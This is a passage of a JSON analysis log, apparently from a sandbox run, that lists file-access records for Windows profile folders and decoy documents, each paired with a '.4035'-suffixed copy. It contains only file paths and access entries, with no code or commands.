7lFSQB0g\\Links\\Downloads.lnk", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\downloads.lnk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Links\\RecentPlaces.lnk.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\recentplaces.lnk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Links\\RecentPlaces.lnk", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\recentplaces.lnk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Windows Live\\Get Windows Live.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\get windows live.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Windows Live\\Get Windows Live.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\get windows live.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Windows Live\\Windows Live Gallery.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\windows live gallery.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Windows Live\\Windows Live Gallery.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\windows live gallery.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Windows Live\\Windows Live Mail.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\windows live mail.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Windows Live\\Windows Live Mail.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\windows live mail.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Windows Live\\Windows Live Spaces.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\windows live spaces.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Windows Live\\Windows Live Spaces.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\windows live spaces.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN Autos.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn autos.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN Autos.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn autos.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN Entertainment.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn entertainment.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN Entertainment.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn entertainment.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN Money.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn money.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN Money.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn money.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN Sports.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn sports.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN Sports.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn sports.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSN.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msn.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSNBC News.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msnbc news.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\MSNBC News.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\msnbc news.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\IE Add-on site.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\ie add-on site.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\IE Add-on site.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\ie add-on site.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\ie site on microsoft.com.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\ie site on microsoft.com.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\Microsoft At Home.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\microsoft at home.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\Microsoft At Home.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\microsoft at home.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\Microsoft At Work.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\microsoft at work.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\Microsoft At Work.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\microsoft at work.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\Microsoft Store.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\microsoft store.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\Microsoft Store.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\microsoft store.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Links\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Links\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Links\\Suggested Sites.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\\suggested sites.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Links\\Suggested Sites.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\\suggested sites.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Links\\Web Slice Gallery.url.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\\web slice gallery.url.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Links\\Web Slice Gallery.url", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\\web slice gallery.url", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Downloads\\ChromeSetup.exe.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\downloads\\chromesetup.exe.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Downloads\\ChromeSetup.exe", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\downloads\\chromesetup.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Downloads\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\downloads\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Downloads\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\downloads\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\0yzd1AF1TXI8bw.xlsx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\0yzd1af1txi8bw.xlsx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\0yzd1AF1TXI8bw.xlsx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\0yzd1af1txi8bw.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\4NeLGlgmC3gp9926cjXJ.pdf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\4nelglgmc3gp9926cjxj.pdf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\4NeLGlgmC3gp9926cjXJ.pdf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\4nelglgmc3gp9926cjxj.pdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\8iuJAj-TJMwgMpxgt.xlsx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\8iujaj-tjmwgmpxgt.xlsx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\8iuJAj-TJMwgMpxgt.xlsx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\8iujaj-tjmwgmpxgt.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\a2zN2i8e425ITp.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\a2zn2i8e425itp.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\a2zN2i8e425ITp.pptx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\a2zn2i8e425itp.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Brs2hg-mdiC176pMg3.docx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\brs2hg-mdic176pmg3.docx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Brs2hg-mdiC176pMg3.docx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\brs2hg-mdic176pmg3.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\BSCI0Nbj_4h1m E.ppt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\bsci0nbj_4h1m e.ppt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\BSCI0Nbj_4h1m E.ppt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\bsci0nbj_4h1m e.ppt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\CEVp.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\cevp.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\CEVp.pptx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\cevp.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\ClSQNOC.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\clsqnoc.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\ClSQNOC.pptx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\clsqnoc.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\EcXY-g-QNVGVRke.csv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\ecxy-g-qnvgvrke.csv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\EcXY-g-QNVGVRke.csv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\ecxy-g-qnvgvrke.csv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\fOVrO73aJNtj25.docx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\fovro73ajntj25.docx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\fOVrO73aJNtj25.docx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\fovro73ajntj25.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\gOuzYN7OUc-v.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\gouzyn7ouc-v.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\gOuzYN7OUc-v.pptx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\gouzyn7ouc-v.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\hGZp56Gcx1rkrb_jQM.rtf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\hgzp56gcx1rkrb_jqm.rtf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\hGZp56Gcx1rkrb_jQM.rtf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\hgzp56gcx1rkrb_jqm.rtf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\J8xelqpfMwhFwUdd1rt.pps.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\j8xelqpfmwhfwudd1rt.pps.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\J8xelqpfMwhFwUdd1rt.pps", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\j8xelqpfmwhfwudd1rt.pps", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\KpmFjxBCL _z_xv.xlsx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\kpmfjxbcl _z_xv.xlsx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\KpmFjxBCL _z_xv.xlsx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\kpmfjxbcl _z_xv.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\LorXOqQkVS6f-CJB3Y.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\lorxoqqkvs6f-cjb3y.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\LorXOqQkVS6f-CJB3Y.pptx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\lorxoqqkvs6f-cjb3y.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\lvlZfVQPqjkRs.xlsx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\lvlzfvqpqjkrs.xlsx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\lvlZfVQPqjkRs.xlsx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\lvlzfvqpqjkrs.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\m3cKl.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\m3ckl.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\m3cKl.pptx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\m3ckl.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\M9d60zrm69ZwPT.docx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\m9d60zrm69zwpt.docx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\M9d60zrm69ZwPT.docx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\m9d60zrm69zwpt.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\N9kR1O8Sic34aaPindff.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\n9kr1o8sic34aapindff.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\N9kR1O8Sic34aaPindff.pptx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\n9kr1o8sic34aapindff.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Nu Wcixbhe 2upa1m.xlsx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\nu wcixbhe 2upa1m.xlsx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Nu Wcixbhe 2upa1m.xlsx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\nu wcixbhe 2upa1m.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\OqsQkgPVws2KW2MpHE.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\oqsqkgpvws2kw2mphe.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\OqsQkgPVws2KW2MpHE.pptx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\oqsqkgpvws2kw2mphe.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\qIuknaouCKsmM3Maz2V.rtf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\qiuknaoucksmm3maz2v.rtf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\qIuknaouCKsmM3Maz2V.rtf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\qiuknaoucksmm3maz2v.rtf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\s6260jDRMgooK.ods.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\s6260jdrmgook.ods.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\s6260jDRMgooK.ods", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\s6260jdrmgook.ods", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\sQKXNIbjSAzGvmyd0_f7.doc.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\sqkxnibjsazgvmyd0_f7.doc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\sQKXNIbjSAzGvmyd0_f7.doc", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\sqkxnibjsazgvmyd0_f7.doc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\TXfqtchH6vI5EBg.ods.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\txfqtchh6vi5ebg.ods.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\TXfqtchH6vI5EBg.ods", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\txfqtchh6vi5ebg.ods", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Uh0MOTMwnhM5QslZdVd.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\uh0motmwnhm5qslzdvd.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Uh0MOTMwnhM5QslZdVd.pptx", "hashes": [], "norm_filename": 